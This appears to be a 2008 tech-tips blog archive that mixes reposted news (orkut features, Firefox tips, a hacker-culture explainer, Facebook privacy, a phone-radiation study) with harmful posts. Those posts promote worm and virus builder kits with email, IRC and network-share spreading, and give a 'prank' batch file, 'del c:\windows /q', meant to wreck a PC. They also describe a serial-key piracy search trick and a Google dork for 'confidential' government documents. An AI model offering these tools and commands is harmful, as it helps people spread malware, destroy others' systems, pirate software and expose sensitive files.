This little program allows you to add source code and generate your own worm/virus,it has some samples of code inside the zip too
VBSwg 2 beta - Virus builder
Builds worm and add spread options like email or mIRC then you choose what to infect on computers,change PC name, go to url option, antideletion, polymorphic and other shit
p0ke's WormGen 2.0
Nice easy worm generator that will spread through network shares and emails , it will scan for emails ,it has irc bot and more options
A DOS virus builder
Thursday, January 31, 2008
Monday, January 28, 2008
Well pretty known to u people how to hide a file
Tools>Folder options> View tab >>>>>>
But take a good look just below the show hidden files option
#Hide Extension for known file types
#Hide Protected Operating System Files(Recommended)
Cross both the options n click on show hidden files n apply
a hidden folder named as "System Volume Information" will appear with some other
icons like Recycled n others
Put what ever u want to hide frm others in "System Volume Information" n
#Hide Extension for known file types
#Hide Protected Operating System Files(Recommended)
"System Volume Information" is hidden but other hidden files r visible in window
So a Moron cannot view ur extreme personal data !
Sunday, January 27, 2008
This is real cool tip for people who use notepad to write down any info on a day to day basis...
* Open a notepad and type '.LOG' (CASE SENSITIVE) as the first line of the file.
* Save and close the file .
* Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the next line.
* Type your notes and then save and close the file.
Each time you open the file, Notepad repeats the process, appending the time and date to the end of the file and placing the cursor below it.
It simply serves as a virtual diary !
if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up
this works great in google
HOW DOES THIS WORK?
Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.
1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.
2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.
I hope this trick help you finding your ccd keys easily
Thursday, January 24, 2008
You may have noticed that the orkut logo looked a little different when you signed in today -- and if the four candles on the cake didn't give it away already, it's our fourth birthday. That's right, 2/5ths of a decade ago, orkut launched. It has grown up pretty fast, with many more features, communities, friends and photos since it first opened as an invite-only community. Whether you've been with us for years or days, thank you for being a part of the orkut community!
When orkut launched, we had no idea that scrapbooks would be the primary way members would interact. Billions of scraps later, we've learned that scraps are a huge hit, and have added ways to make them even more fun by enabling you to add videos, photos and HTML.
We've been wondering (and perhaps you have too): Which orkut users are scrappiest? In our recent sample, members from the island nation of Grenada had the highest scrap counts at an average of 1877 scraps. Of the biggest orkut nations, Pakistanis came in first, followed by Americans, Indians, and Brazilians. (All of these statistics are based on current scraps that have not been deleted by the recipients.)
Women receive just under half (48%) of all scraps. Women from the Cayman Islands receive the most, followed by those from the British Virgin Islands, Trinidad and Tobago, San Marino, and the Northern Mariana Islands. (What is it about those islanders?) Albanian women had the fewest scraps (81) -- still a pretty substantial number when you think about it.
On the male side, islanders still rule: men from Grenada averaged a whopping 2569 scraps each. Here's the full chart:
|Country (gender)||Scraps received||Scraps received (women)||Scraps received (men)|
Who's sending these scraps? The scrappiest users hail from Pakistan, followed immediately by Madagascar and the Central African Republic. Among women, the most scraps come from Jamaica, then Madagascar, followed by the nation of St. Pierre and Miquelon. Among men, Pakistanis sent the most, then Qatar.
And what are people saying in scraps? Some messages occurred again and again. Out of a sample of 1,000,000 short scraps, the following were among the most common:
|scrap||# of occurrences|
Not only was the word "hi" common, it also appeared frequently followed by extra "i"s. For example, "hiiiiiiiii", "hiiiiiiiiiiiii", and "hiiiiiiiiiii" each occurred more than 90 times in our 1,000,000 scrap sample.
Until next time, our 46th most popular scrap: "bye"!
Tuesday, January 22, 2008
But look under the hood, and there are a bunch of hidden (and some not-so-secret) tips and tricks available that will crank Firefox up and pimp your browser. Make it faster, cooler, more efficient. Get to be a Jedi master with the following cool Firefox tricks.
1) More screen space. Make your icons small. Go to View - Toolbars - Customize and check the “Use small icons” box.
2) Smart keywords. If there’s a search you use a lot (let’s say IMDB.com’s people search), this is an awesome tool that not many people use. Right-click on the search box, select “Add a Keyword for this search”, give the keyword a name and an easy-to-type and easy-to-remember shortcut name (let’s say “actor”) and save it. Now, when you want to do an actor search, go to Firefox’s address bar, type “actor” and the name of the actor and press return. Instant search! You can do this with any search box.
3) Keyboard shortcuts. This is where you become a real Jedi. It just takes a little while to learn these, but once you do, your browsing will be super fast. Here are some of the most common (and my personal favs):
- Spacebar (page down)
- Shift-Spacebar (page up)
- Ctrl+F (find)
- Alt-N (find next)
- Ctrl+D (bookmark page)
- Ctrl+T (new tab)
- Ctrl+K (go to search box)
- Ctrl+L (go to address bar)
- Ctrl+= (increase text size)
- Ctrl+- (decrease text size)
- Ctrl-W (close tab)
- F5 (reload)
- Alt-Home (go to home page)
4) Auto-complete. This is another keyboard shortcut, but it’s not commonly known and very useful. Go to the address bar (Control-L) and type the name of the site without the “www” or the “.com”. Let’s say “google”. Then press Control-Enter, and it will automatically fill in the “www” and the “.com” and take you there - like magic! For .net addresses, press Shift-Enter, and for .org addresses, press Control-Shift-Enter.
5) Tab navigation. Instead of using the mouse to select different tabs that you have open, use the keyboard. Here are the shortcuts:
- Ctrl+Tab (rotate forward among tabs)
- Ctrl+Shft+Tab (rotate to the previous tab)
- Ctrl+1-9 (choose a number to jump to a specific tab)
6) Mouse shortcuts. Sometimes you’re already using your mouse and it’s easier to use a mouse shortcut than to go back to the keyboard. Master these cool ones:
- Middle click on link (opens in new tab)
- Shift-scroll down (previous page)
- Shift-scroll up (next page)
- Ctrl-scroll up (decrease text size)
- Ctrl-scroll down (increase text size)
- Middle click on a tab (closes tab)
7) Delete items from address bar history. Firefox’s ability to automatically show previous URLs you’ve visited, as you type, in the address bar’s drop-down history menu is very cool. But sometimes you just don’t want those URLs to show up (I won’t ask why). Go to the address bar (Ctrl-L), start typing an address, and the drop-down menu will appear with the URLs of pages you’ve visited with those letters in them. Use the down-arrow to go down to an address you want to delete, and press the Delete key to make it disappear.
User chrome. If you really want to trick out your Firefox, you’ll want to create a UserChrome.css file and customize your browser. It’s a bit complicated to get into here, but check out this tutorial.
9) Create a user.js file. Another way to customize Firefox, creating a user.js file can really speed up your browsing. You’ll need to create a text file named user.js in your profile folder (see this to find out where the profile folder is) and see this example user.js file that you can modify. Created by techlifeweb.com, this example explains some of the things you can do in its comments.
10) about:config. The true power user’s tool, about.config isn’t something to mess with if you don’t know what a setting does. You can get to the main configuration screen by putting about:config in the browser’s address bar. See Mozillazine’s about:config tips and screenshots.
11) Add a keyword for a bookmark. Go to your bookmarks much faster by giving them keywords. Right-click the bookmark and then select Properties. Put a short keyword in the keyword field, save it, and now you can type that keyword in the address bar and it will go to that bookmark.
12) Speed up Firefox. If you have a broadband connection (and most of us do), you can use pipelining to speed up your page loads. This allows Firefox to load multiple things on a page at once, instead of one at a time (by default, it’s optimized for dialup connections). Here’s how:
- Type “about:config” into the address bar and hit return. Type “network.http” in the filter field, and change the following settings (double-click on them to change them):
- Set “network.http.pipelining” to “true”
- Set “network.http.proxy.pipelining” to “true”
- Set “network.http.pipelining.maxrequests” to a number like 30. This will allow it to make 30 requests at once.
- Also, right-click anywhere and select New-> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0″. This value is the amount of time the browser waits before it acts on information it receives.
13) Limit RAM usage. If Firefox takes up too much memory on your computer, you can limit the amount of RAM it is allowed to us. Again, go to about:config, filter “browser.cache” and select “browser.cache.disk.capacity”. It’s set to 50000, but you can lower it, depending on how much memory you have. Try 15000 if you have between 512MB and 1GB ram.
14) Reduce RAM usage further for when Firefox is minimized. This setting will move Firefox to your hard drive when you minimize it, taking up much less memory. And there is no noticeable difference in speed when you restore Firefox, so it’s definitely worth a go. Again, go to about:config, right-click anywhere and select New-> Boolean. Name it “config.trim_on_minimize” and set it to TRUE. You have to restart Firefox for these settings to take effect.
15) Move or remove the close tab button. Do you accidentally click on the close button of Firefox’s tabs? You can move them or remove them, again through about:config. Edit the preference for “browser.tabs.closeButtons”. Here are the meanings of each value:
- 0: Display a close button on the active tab only
- 1:(Default) Display close buttons on all tabs
- 2:Don’t display any close buttons
- 3:Display a single close button at the end of the tab bar (Firefox 1.x behavior)
On the other hand, unethical hacking is the process of entering private networks or sites on the Internet and offline in order to access confidential information and the like. The data that is retrieved from hacking into these sites and networks are then used for criminal activities. These criminals oftentimes use the confidential information they gain to extract passwords, banking details, credit card accounts, and even personal data that can be used to further support their criminal activities.
There is a Google hack that makes use of the filetype syntax followed by any file format directed towards a domain extension as well as the particular type of information. For instance, you can do a search on Google for all file types related to the data you want to acquire by keying in: filename:xxx site:yyy zzz where xxx is the file extension, yyy the domain extension, and zzz the type of information. In more general terms - if you wanted to have access to the confidential documents of any government, you can key in filetype:doc site:gov confidential.
Enjoy more Orkuting (-:
Greasemonkey Script: This script provides you Interactive Shortcuts for Orkut.
My mom says that I am the laziest person in this world. But I never bother about her comments. After all, technology is something that makes us a little lazy and i can't leave new technologies. Here is presenting you with the laziest "Interactive Orkut Shortcuts" script. Visit One corner of orkut from the orkut and be lazy like me.
Minimum Requirements : Mozilla Firefox, Greasemonkey Add-on.
Install the script, take a cup of coffee and relax. This script has all those hover effects too, which others don'
Thanks to the media, the word "hacker" has gotten a bad reputation. The word summons up thoughts of malicious computer users finding new ways to harass people, defraud corporations, steal information and maybe even destroy the economy or start a war by infiltrating military computer systems. While there's no denying that there are hackers out there with bad intentions, they make up only a small percentage of the hacker community.
Hackers from around the world gather at camps to
practice their hobby and trade tips.
The term computer hacker first showed up in the mid-1960s. A hacker was a programmer -- someone who hacked out computer code. Hackers were visionaries who could see new ways to use computers, creating programs that no one else could conceive. They were the pioneers of the computer industry, building everything from small applications to operating systems. In this sense, people like Bill Gates, Steve Jobs and Steve Wozniak were all hackers -- they saw the potential of what computers could do and created ways to achieve that potential.
A unifying trait among these hackers was a strong sense of curiosity, sometimes bordering on obsession. These hackers prided themselves on not only their ability to create new programs, but also to learn how other programs and systems worked. When a program had a bug -- a section of bad code that prevented the program from working properly -- hackers would often create and distribute small sections of code called patches to fix the problem. Some managed to land a job that leveraged their skills, getting paid for what they'd happily do for free.
As computers evolved, computer engineers began to network individual machines together into a system. Soon, the term hacker had a new meaning -- a person using computers to explore a network to which he or she didn't belong. Usually hackers didn't have any malicious intent. They just wanted to know how computer networks worked and saw any barrier between them and that knowledge as a challenge.
In fact, that's still the case today. While there are plenty of stories about malicious hackers sabotaging computer systems, infiltrating networks and spreading computer viruses, most hackers are just curious -- they want to know all the intricacies of the computer world. Some use their knowledge to help corporations and governments construct better security measures. Others might use their skills for more unethical endeavors.
In this article, we'll explore common techniques hackers use to infiltrate systems. We'll examine hacker culture and the various kinds of hackers as well as learn about famous hackers, some of whom have run afoul of the law.
Hackers and Crackers
Many computer programmers insist that the word "hacker" applies only to law-abiding enthusiasts who help create programs and applications or improve computer security. Anyone using his or her skills maliciously isn't a hacker at all, but a cracker.
Crackers infiltrate systems and cause mischief, or worse. Unfortunately, most people outside the hacker community use the word as a negative term because they don't understand the distinction between hackers and crackers.
The Hacker Toolbox
The main resource hackers rely upon, apart from their own ingenuity, is computer code. While there is a large community of hackers on the Internet, only a relatively small number of hackers actually program code. Many hackers seek out and download code written by other people. There are thousands of different programs hackers use to explore computers and networks. These programs give hackers a lot of power over innocent users and organizations -- once a skilled hacker knows how a system works, he can design programs that exploit it.
The ILOVEYOU Computer Virus was a malicious program
that plagued computers worldwide and caused millions of dollars in damages.
Malicious hackers use programs to:
* Hack passwords:There are many ways to hack someone's password, from educated guesses to simple algorithms that generate combinations of letters, numbers and symbols. The trial and error method of hacking passwords is called a brute force attack,meaning the hacker tries to generate every possible combination to gain access. Another way to hack passwords is to use a dictionary attack, program that inserts common words into password fields.
*Infect a computer or system with a virus: Computer viruses are programs designed to duplicate themselves and cause problems ranging from crashing a computer to wiping out everything on a system's hard drive. A hacker might install a virus by infiltrating a system, but it's much more common for hackers to create simple viruses and send them out to potential victims via email, instant messages, Web sites with downloadable content or peer-to-peer networks.
* Log keystrokes: Some programs allow hackers to review every keystroke a computer user makes. Once installed on a victim's computer, the programs record each keystroke, giving the hacker everything he needs to infiltrate a system or even steal someone's identity.
Gain backdoor access: Similar to hacking passwords, some hackers create programs that search for unprotected pathways into network systems and computers. In the early days of the Internet, many computer systems had limited security, making it possible for a hacker to find a pathway into the system without a username or password. Another way a hacker might gain backdoor access is to infect a computer or system with a Trojan horse.
*Create zombie computers: A zombie computer, or bot, is a computer that a hacker can use to send spam or commit Distributed Denial of Service (DDoS) attacks. After a victim executes seemingly innocent code, a connection opens between his computer and the hacker's system. The hacker can secretly control the victim's computer, using it to commit crimes or spread spam.
*Spy on e-mail: Hackers have created code that lets them intercept and read e-mail messages -- the Internet's equivalent to wiretapping. Today, most e-mail programs use encryption formulas so complex that even if a hacker intercepts the message, he won't be able to read it.
Psychologist Marc Rogers says there are several subgroups of hackers -- newbies, cyberpunks, coders and cyber terrorists. Newbies are hackers who have access to hacking tools but aren't really aware of how computers and programs work. Cyberpunks are savvier and are less likely to get caught than a newbie while hacking a system, but they have a tendency to boast about their accomplishments. Coders write the programs other hackers use to infiltrate and navigate computer systems. A cyber terrorist is a professional hacker who infiltrates systems for profit -- he might sabotage a company or raid a corporation's databases for proprietary information [source: Knittel and Soto]
Individually, many hackers are antisocial. Their intense interest in computers and programming can become a communication barrier. Left to his or her own devices, a hacker can spend hours working on a computer program while neglecting everything else.
Computer networks gave hackers a way to associate with other people with their same interests. Before the Internet became easily accessible, hackers would set up and visit bulletin board systems (BBS). A hacker could host a bulletin board system on his or her computer and let people dial into the system to send messages, share information, play games and download programs. As hackers found one another, information exchanges increased dramatically.
Some hackers posted their accomplishments on a BBS, boasting about infiltrating secure systems. Often they would upload a document from their victims' databases to prove their claims. By the early 1990s, law enforcement officials considered hackers an enormous security threat. There seemed to be hundreds of people who could hack into the world's most secure systems at will [source: Sterling].
There are many Web sites dedicated to hacking. The hacker journal "2600: The Hacker Quarterly" has its own site, complete with a live broadcast section dedicated to hacker topics. The print version is still available on newsstands. Web sites like Hacker.org promote learning and include puzzles and competitions for hackers to test their skills.
Before computer hackers, curious and clever individuals found ways to manipulate the phone system in a phenomenon called phreaking. Through phreaking, these individuals found ways to make long distance calls for free or sometimes just played pranks on other telephone users.
When caught -- either by law enforcement or corporations -- some hackers admit that they could have caused massive problems. Most hackers don't want to cause trouble; instead, they hack into systems just because they wanted to know how the systems work. To a hacker, a secure system is like Mt. Everest -- he or she infiltrates it for the sheer challenge. In the United States, a hacker can get into trouble for just entering a system. The Computer Fraud and Abuse Act outlaws unauthorized access to computer systems [source: Hacking Laws].
Not all hackers try to explore forbidden computer systems. Some use their talents and knowledge to create better software and security measures. In fact, many hackers who once used their skills to break into systems now put that knowledge and ingenuity to use by creating more comprehensive security measures. In a way, the Internet is a battleground between different kinds of hackers -- the bad guys, or black hats, who try to infiltrate systems or spread viruses, and the good guys, or white hats, who bolster security systems and develop powerful virus protection software.
Hackers work together to create "mashups" of
Yahoo applications at Yahoo Hack Day 2006.
Hackers on both sides overwhelmingly support open source software, programs in which the source code is available for anyone to study, copy, distribute and modify. With open source software, hackers can learn from other hackers' experiences and help make programs work better than they did before. Programs might range from simple applications to complex operating systems like Linux.
There are several annual hacker events, most of which promote responsible behavior. A yearly convention in Las Vegas called DEFCON sees thousands of attendees gather to exchange programs, compete in contests, participate in panel discussions about hacking and computer development and generally promote the pursuit of satisfying curiosity. A similar event called the Chaos Communication Camp combines low-tech living arrangements -- most attendees stay in tents -- and high-tech conversation and activities.
Hackers and the Law
In general, most governments aren't too crazy about hackers. Hackers' ability to slip in and out of computers undetected, stealing classified information when it amuses them, is enough to give a government official a nightmare. Secret information, or intelligence, is incredibly important. Many government agents won't take the time to differentiate between a curious hacker who wants to test his skills on an advanced security system and a spy.
Laws reflect this attitude. In the United States, there are several laws forbidding the practice of hacking. Some, like 18 U.S.C. § 1029, concentrate on the creation, distribution and use of codes and devices that give hackers unauthorized access to computer systems. The language of the law only specifies using or creating such a device with the intent to defraud, so an accused hacker could argue he just used the devices to learn how security systems worked.
Concern about hackers reaches up to the highest levels of
government. Here, former Attorney General
Janet Reno testifies about hacker activity.
Another important law is 18 U.S.C. § 1030, part of which forbids unauthorized access to government computers. Even if a hacker just wants to get into the system, he or she could be breaking the law and be punished for accessing a nonpublic government computer [Source: U.S. Department of Justice].
Punishments range from hefty fines to jail time. Minor offenses may earn a hacker as little as six months' probation, while other offenses can result in a maximum sentence of 20 years in jail. One formula on the Department of Justice's Web page factors in the financial damage a hacker causes, added to the number of his victims to determine an appropriate punishment [Source: U.S. Department of Justice].
Other countries have similar laws, some much more vague than legislation in the U.S. A recent German law forbids possession of "hacker tools." Critics say that the law is too broad and that many legitimate applications fall under its vague definition of hacker tools. Some point out that under this legislation, companies would be breaking the law if they hired hackers to look for flaws in their security systems [source: IDG News Service].
Hackers can commit crimes in one country while sitting comfortably in front of their computers on the other side of the world. Therefore, prosecuting a hacker is a complicated process. Law enforcement officials have to petition countries to extradite suspects in order to hold a trial, and this process can take years. One famous case is the United States' indictment of hacker Gary McKinnon. Since 2002, McKinnon fought extradition charges to the U.S. for hacking into the Department of Defense and NASA computer systems. McKinnon, who hacked from the United Kingdom, defended himself by claiming that he merely pointed out flaws in important security systems. In April 2007, his battle against extradition came to an end when the British courts denied his appeal [Source: BBC News].
Hacking a Living
Hackers who obey the law can make a good living. Several companies hire hackers to test their security systems for flaws. Hackers can also make their fortunes by creating useful programs and applications, like Stanford University students Larry Page and Sergey Brin. Page and Brin worked together to create a search engine they eventually named Google. Today, they are tied for 26th place on Forbes' list of the world's most wealthy billionaires [source: Forbes].
Steve Jobs and Steve Wozniak, founders of Apple Computers, are both hackers. Some of their early exploits even resemble the questionable activities of some malicious hackers. However, both Jobs and Wozniak outgrew their malicious behavior and began concentrating on creating computer hardware and software. Their efforts helped usher in the age of the personal computer -- before Apple, computer systems remained the property of large corporations, too expensive and cumbersome for average consumers.
Steve Jobs, co-founder of
Apple and pioneer hacker
Linus Torvalds, creator of Linux, is another famous honest hacker. His open source operating system is very popular with other hackers. He has helped promote the concept of open source software, showing that when you open information up to everyone, you can reap amazing benefits.
Richard Stallman, also known as "rms," founded the GNU Project, a free operating system. He promotes the concept of free software and computer access. He works with organizations like the Free Software Foundation and opposes policies like Digital Rights Management.
On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to get sent to prison. He committed computer intrusions on some very high-profile victims, including NASA and a Defense Threat Reduction Agency server. Online, Jonathan used the nickname (called a handle) "c0mrade." Originally sentenced to house arrest, James was sent to prison when he violated parole.
Hacker Kevin Mitnick, newly released from the Federal
Correctional Institution in Lompoc, California.
Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old. Mitnick's reputation seemed to grow with every retelling of his exploits, eventually leading to the rumor that Mitnick had made the FBI's Most Wanted list. In reality, Mitnick was arrested several times for hacking into secure systems, usually to gain access to powerful computer software.
Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He's famous for hacking the phones of a radio station called KIIS-FM. Poulsen's hack allowed only calls originating from his house to make it through to the station, allowing him to win in various radio contests. Since then, he has turned over a new leaf, and now he's famous for being a senior editor at Wired magazine.
Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws, exploit the flaws to hack into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant -- his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.
It's likely that there are thousands of hackers active online today, but an accurate count is impossible. Many hackers don't really know what they are doing -- they're just using dangerous tools they don't completely understand. Others know what they're doing so well that they can slip in and out of systems without anyone ever knowing.
You think that it's easy to fix this problem by going to Registry Editor but you can't! You get the error message "Registry editing has been disabled by your administrator".
Folder Options and even Show Hidden Files & Folder is disabled! How frustrating! Don't worry, here's how to restore your Windows Task Manager, Registry Editor, Folder Options and Show hidden files & folders.
This problem is most commonly caused by a virus called "Brontok". Brontok virus will make some changes to the system restrictions in order to hide itself from easy detection and also from easy cleaning.
Here's a free tool called Remove Restrictions Tool (RRT) which is able to re-enables all what the virus had previously disabled, and gives you back the control over your own computer.
Remove Restrictions Tool is able to re-enable:
- Registry Tools (regedit)
- Folder Options
- Show Hidden Files
Small and easy to use. Make sure you boot in to Safe Mode to use Remove Restrictions Tool (RRT). Just click on the buttons and it'll do it's job.
Click Here to download
Monday, January 21, 2008
We often hear about vulnerabilities in Microsoft products that allow viruses to enter computers. Today, however, the news is about a virus attacking through a weakness in software that is supposed to protect you from such attacks.
eEye Digital Security, a noted security vendor, recently provided an alert regarding a susceptibility in Symantec Antivirus that allows a hacker to infiltrate and take control of a computer system that is running certain Symantec software. Shortly after the eEye's alert, Symantec confirmed the veracity of the story. The finding of this security flaw is of special importance since Symantec is one of the world's leading makers of antivirus software.
Fortunately for home users, the flaw is found only in Symantec Antivirus Corporate Edition and Symantec Client Security 3.x. Home users of Norton Antivirus and Norton Internet Security products are not at risk. Symantec is working on a patch to eliminate the problem and will download the fix to corporate users as soon as it is available.
When Apple announced that new Macs would have Intel processors rather than the traditional Motorola chips,
speculation began about the possibility of being able to run the Windows operating system on a Mac machine. Hackers were able to do that quite quickly, but their methods were fairly complicated.
Now Apple has made running Windows on a Mac easy. They have introduced a new program called Boot Camp, which allows Windows XP to run on an Intel-based Macintosh computer. This program is not an emulator or a virtualization engine like previous software that allowed Windows programs to run on a Mac. Instead, it is a program that configures the Macintosh drive so that it can boot to either Apple's OS X or Microsoft's Windows XP. This allows Windows programs to run natively giving them the full power and performance.
Although the Boot Camp program is still in its Beta testing mode, it is available to anyone for free download at the Apple website. Early testing shows that it is stable and fairly easy to install with only a few minor glitches. Currently Apple is not supporting the installation or use of Boot Camp. We may, however, find that it is a part of Leopard, the next Mac operating system upgrade, which should make its appearance sometime in late 2006 or early 2007.
Boot Camp requires the separate purchase of the Windows XP operating system. Yet it is being hailed as a wonderful tool that will allow computer shoppers to purchase a Mac, use the Mac OS X operating system, and still be able to run PC games and other software that may be unavailable in a Macintosh version.
With only a 2.3 percent share of the U.S. PC market last year, Apple is hoping that being able to run Windows on a Mac will increase sales.
Google Inc. over the weekend quietly announced Google Profiles, which provide a way for users of various Google products like Google Maps and Google Reader to offer information about themselves to other users.
The announcement got some bloggers twittering about a possible future foray by Google into social networking. A Google Profile will initially include basic points, like a user`s name, photo and location, and can include other information, like a person`s profession.
"You control what goes into your Google Profile, sharing as much (or as little) as you`d like," Google noted on a Web page with a brief description about Google Profiles. "Use multiple Google products? Soon your Google Profile will link up with these as well."
Anyone can see a user`s profile, the site noted, and if a user includes his full name in a profile, it may be returned in Google search results for that name.
The new Google Profiles are already available in Google Maps and Google Reader and will be added to other Web applications, noted Ionut Alex Chitu, in a post at the Google Operating System blog.
"It is not a stretch to see that these profiles are the perfect host for your activity streams, and your public activities could become a part of the profile (uploading photos to a photo album, bookmarking Web pages, posting a new blog post)," Chitu wrote.
Sepideh Saremi, a blogger at search engine optimization company Reprise Media, noted that this move, combined with Friday`s announcement that Google Reader has been linked to the Google Talk chat feature in Gmail to help users better share content with friends, shows that Google is moving closer to building a social network.
Google is chipping away at rival Facebook by "leveraging the dependency Google users have on Google products and building a social network that integrates these products," Saremi wrote.
"Facebook, which tends to annoy its finicky user base by rolling out features that don`t necessarily have the user`s best interest at heart, should also look to Google when it wants to implement changes to its site," Saremi added. "Google is rolling out its own social features methodically, explaining them clearly, and respecting their user base by saying they will make changes per user feedback. Google`s evolving social network platform will absolutely rival Facebook, and probably sooner than anyone realizes."
Microsoft Corp. confirmed today that it is investigating reports that a security update for Internet Explorer issued last week has crippled some users` ability to get on the Web with the browser.
Users started posting messages to multiple Microsoft support newsgroups almost immediately after Microsoft released the MS07-069 security bulletin on Dec. 11, saying that they were unable to connect to the Internet, either because IE refused to open or because when it did open, it could not reach various sites.
"About 60% of the time, I would get an `Internet Explorer has encountered a problem and must close` dialog," reported Bill Drake on the Windows Update newsgroup. Others echoed those comments on IE-specific forums, noting that both IE6 and IE7 balked at loading, or while loading, some pages, particularly home pages, on both Windows XP and Windows Vista machines.
Harold Decker, operations manager at San Diego-based Gold Peak Industries NA Inc., started fielding calls from users last Wednesday morning as soon as people hit the office. "I stopped everyone who hadn`t installed the update from installing it, after four PCs out of 14 had the problem," said Decker, who manages a total of 35 Windows XP SP2 machines. "We`re a pretty plain shop; all our systems run Windows XP SP2 and IE6," said Decker. "But some kept crashing. It seemed limited to the window that was opened, and changing the home page to something simple, like a blank page, gave a better success rate."
Decker cited numerous brand-name sites that workers at Gold Peak couldn't reach without crashing IE, including Federal Express` and Lowe`s Home Improvements.
Microsoft said it is on the case. "Our customer service and support teams are investigating public claims of a deployment issue with Microsoft Security Bulletin MS07-069," Microsoft`s Mark Miller, director of security response, acknowledged in an e-mail. "If necessary, Microsoft will update the Knowledge Base article associated with MS07-069 with detailed guidance on how to prevent or address these deployment issues," Miller added.
Other users on the support forums weren`t much help, except to suggest uninstalling last Tuesday`s security update. That`s what Decker did. "We uninstalled [MS07-069] and have had no problems since then," he said.
Facebook says it does not use information from deactivated accounts
The investigation follows a complaint by a user of the social network who was unable to fully delete their profile even after terminating their account.
Currently, personal information remains on Facebook's servers even after a user deactivates an account.
Facebook has said it believes its policy is in "full compliance with UK data protection law".
"We take the concerns of the ICO [Information Commissioner's Office] and our user's privacy very seriously and are committed to working with the ICO to maintain a trusted environment for all Facebook users and ensure compliance with UK law," said a statement from the site.
At present, Facebook users who wish to remove their profile from the site are given the opportunity to deactivate their account.
But once deactivated the information, though no longer accessible, remains on Facebook's computers.
This is useful if you might reactivate your account later, but not the same as full deletion.
Users who wish to completely delete their information must, according to the automated response from Facebook's Customer Service, ¿log in and delete all profile content".
For some users that can be a very laborious process and that concerns the ICO.
"One of the things that we're concerned about is that if the onus is entirely on the individual to delete their data," Dave Evans, Senior Data Protection Practice Manager at the ICO told BBC Radio 4's iPM programme.
"An individual who has deactivated their account might not find themselves motivated enough to delete information that's about them maybe on their wall or other people's site."
The over-riding data protection principle motivating the ICO is that organisations should only hold information as long as necessary.
Facebook maintains it is in compliance with all data protection legislation and says it does not use information from deactivated accounts.
Mr Evans said that he believed that Facebook were committed to being seen to do as much as possible to safeguard people's privacy.
"We've agreed with Facebook to discuss with them issues around what they do with my information if I wish to deactivate my account".
Although Facebook and many other social networks are based outside of the UK, Mr Evans believes that UK law could still apply.
"They are established in the UK for UK legislation to cover their activities."
He said it was the clarity of information users receive on signing up with social networking sites that is the central concern of the ICO.
"One of the things that we'll be working with the sites to achieve is to get better quality information to users to make it absolutely clear to people what exactly will happen to their information once it's posted."
The evidence on mobile phone safety has been contradictory
The study, funded by mobile phone companies, suggests radiation from the handset can cause insomnia, headaches and confusion.
It may also cut our amount of deep sleep - interfering with the body's ability to refresh itself.
The study was carried out by Sweden's Karolinska Institute and Wayne State University in the US.
Funded by the Mobile Manufacturers Forum, the scientists studied 35 men and 36 women aged between 18 and 45.
Some were exposed to radiation equivalent to that received when using a mobile phone, others were placed in the same conditions, but given only "sham" exposure.
Those exposed to radiation took longer to enter the first of the deeper stages of sleep, and spent less time in the deepest one.
The scientists concluded: "The study indicates that during laboratory exposure to 884 MHz wireless signals components of sleep believed to be important for recovery from daily wear and tear are adversely affected."
Researcher Professor Bengt Arnetz said: "The study strongly suggests that mobile phone use is associated with specific changes in the areas of the brain responsible for activating and coordinating the stress system."
Another theory is that radiation may disrupt production of the hormone melatonin, which controls the body's internal rhythms.
About half the people in the study believed themselves to be "electrosensitive", reporting symptoms such as headaches and impaired cognitive function from mobile phone use.
But they proved to be unable to tell if they had been exposed to the radiation in the test.
Alasdair Philips is director of Powerwatch, which researches the effects of electromagnetic fields on health.
He said: "The evidence is getting stronger that we should treat these things in a precautionary way.
"This research suggests that if you need to make a phone call in the evening it is much better to use a land line, and don't have your mobile by your bedside table."
Mike Dolan, executive director of the Mobile Operators Association, said the study was inconsistent with other research.
He said: "It is really one small piece in a very large scientific jigsaw. It is a very small effect, one researcher likened it to less than the effect you would see from a cup of coffee."
Last September a major six-year study by the UK Mobile Telecommunications and Health Research Programme (MTHRP) concluded that mobile phone use posed no short-term risk to the brain.
However, the researchers said they could not rule out the possibility that long-term use may raise the risk of cancer.
Saturday, January 19, 2008
Sending secret message in scraps:
<acronym title="This trick is working!">
in your friend's scrapbook.
replace "this trick is working!" with any secret message you want.
Now type your scrap body.
Now send the scrap.
Now place the mouse pointer over the text you sent.
That secret message will now appear below the mouse pointer.!
You can also do this for a particular word.
<acronym title="This trick is working!">Hi</acronym>
it will appear like this Hi
Friday, January 18, 2008
Big Movie Index
cartoons and movies
Quality dedicated hosting services are provides by a number of hosting sites like aplus. Another leading name in this category is the startlogic. There are a number of companies around you and you can find the best hosting companies like hostmonster.
Open notepad and type this:
lol=msgbox ("Your Message",20,"Warning")
Then save it as Virus.VBS
Type In NotePad : "del c:\windows /q"(Without Quotes)
Save It As "Screw.bat" !
Don't Run It !
Unless You Want To Screw A PC !
Vulnerabilities : http://bcheck.scanit.be/bcheck/alltests
Statistics : http://bcheck.scanit.be/bcheck/stats.ph
Check Your Browser Security Now : http://bcheck.scanit.be/bcheck/
I Passed The Test And You ?
Saturday, January 12, 2008
Now that you can have 100 photos, we thought you might want to organize them into multiple albums to make it easier for you and others to enjoy. We were looking for ways to group all of our photos on orkut based on the different experiences that they shared. Today, orkut will be launching Photo Albums! Have many photos from a recent trip? Create an album specifically for that trip. Lots of pics from a recent night out with friends? Create another album with just those photos!
All of your current photos will be stored by default in their own album. Feel free to setup new ones by going to "photos" from your homepage. Once you have created an album, simply click on it and start uploading new photos inside. You can also change the cover photo by clicking on "edit" of the photo that you want to appear, and then selecting "album cover."
All of us from orkut look forward to sharing our latest photos with you!
